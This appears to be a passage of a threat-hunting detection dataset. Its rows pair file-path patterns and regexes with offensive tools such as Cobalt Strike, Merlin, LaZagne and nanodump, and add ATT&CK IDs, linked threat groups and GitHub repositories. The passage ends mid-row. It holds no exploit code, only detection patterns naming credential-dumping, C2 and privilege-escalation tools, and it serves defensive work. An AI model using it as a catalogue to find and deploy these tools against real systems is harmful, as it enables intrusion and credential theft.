"*/MakeMeAdmin/zipball*",".{0,1000}\/MakeMeAdmin\/zipball.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8703" "*/MakeMeEnterpriseAdmin.ps1*",".{0,1000}\/MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","8704" "*/MakeMeEnterpriseAdmin.ps1*",".{0,1000}\/MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","8705" "*/MakeMeEnterpriseAdmin.ps1*",".{0,1000}\/MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","8706" "*/malDll.dll*",".{0,1000}\/malDll\.dll.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - 
T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","8707" "*/MaliciousMacroMSBuild*",".{0,1000}\/MaliciousMacroMSBuild.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","8708" "*/malleable-c2*",".{0,1000}\/malleable\-c2.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum 
- REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","8709" "*/MalSCCM.git*",".{0,1000}\/MalSCCM\.git.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","8710" "*/MalSCCM.sln*",".{0,1000}\/MalSCCM\.sln.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","8711" "*/malseclogon.*",".{0,1000}\/malseclogon\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","8712" "*/MalStuff.cpp*",".{0,1000}\/MalStuff\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","8713" "*/man_in_the_browser/*.js*",".{0,1000}\/man_in_the_browser\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","8714" "*/man_in_the_browser/*.rb*",".{0,1000}\/man_in_the_browser\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","8715" "*/manage/exec_cmd*",".{0,1000}\/manage\/exec_cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8716" "*/Management/C2/*",".{0,1000}\/Management\/C2\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","8717" "*/manjusaka/plugins*",".{0,1000}\/manjusaka\/plugins.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","8718" "*/MANSPIDER.git*",".{0,1000}\/MANSPIDER\.git.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","8719" "*/manspider_*.log*",".{0,1000}\/manspider_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","#linux","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","8720" "*/manspider_output*.txt",".{0,1000}\/manspider_output.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8721" "*/manspiderDump*",".{0,1000}\/manspiderDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8722" "*/Mara.git*",".{0,1000}\/Mara\.git.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","1","N/A","N/A","9","1","53","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z","8723" "*/masky.py*",".{0,1000}\/masky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8724" "*/master/GPSCoordinates/*",".{0,1000}\/master\/GPSCoordinates\/.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","8725" "*/master/JunctionFolder/*",".{0,1000}\/master\/JunctionFolder\/.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","8726" "*/master/PhantomService/*",".{0,1000}\/master\/PhantomService\/.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","8727" "*/master/windows/klog_main.cpp*",".{0,1000}\/master\/windows\/klog_main\.cpp.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","8728" "*/maxdb-info.nse*",".{0,1000}\/maxdb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8729" "*/mcafee-epo-agent.nse*",".{0,1000}\/mcafee\-epo\-agent\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8730" "*/md5cracker.rb*",".{0,1000}\/md5cracker\.rb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","8731" "*/MDE_Enum.git*",".{0,1000}\/MDE_Enum\.git.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","1","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","8732" "*/MDExclusionParser.git*",".{0,1000}\/MDExclusionParser\.git.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","1","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","8733" "*/membase-brute.nse*",".{0,1000}\/membase\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8748" "*/membase-http-info.nse*",".{0,1000}\/membase\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8749" "*/memcached-info.nse*",".{0,1000}\/memcached\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8750" "*/memexec.pl*",".{0,1000}\/memexec\.pl.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","8751" "*/memexec.py*",".{0,1000}\/memexec\.py.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","8752" "*/memodipper64*",".{0,1000}\/memodipper64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8753" "*/memory_exec.py*",".{0,1000}\/memory_exec\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - 
T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8754" "*/memorydump.py*",".{0,1000}\/memorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","8755" "*/mempodipper.c*",".{0,1000}\/mempodipper\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8756" 
"*/MemReader_BoF/*",".{0,1000}\/MemReader_BoF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","8757" "*/merlin.dll*",".{0,1000}\/merlin\.dll.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in 
Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","8758" "*/merlin.dll*",".{0,1000}\/merlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","8759" "*/merlin.git*",".{0,1000}\/merlin\.git.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8760" "*/merlin.html*",".{0,1000}\/merlin\.html.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","0","1","N/A","high False positives rate","1","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8761" "*/merlin.py*",".{0,1000}\/merlin\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","8762" "*/merlin/agent_code/*",".{0,1000}\/merlin\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","8763" "*/merlin/data/modules/*",".{0,1000}\/merlin\/data\/modules\/.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8764" "*/merlinAgent-*.exe*",".{0,1000}\/merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8765" "*/merlin-agent.git*",".{0,1000}\/merlin\-agent\.git.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
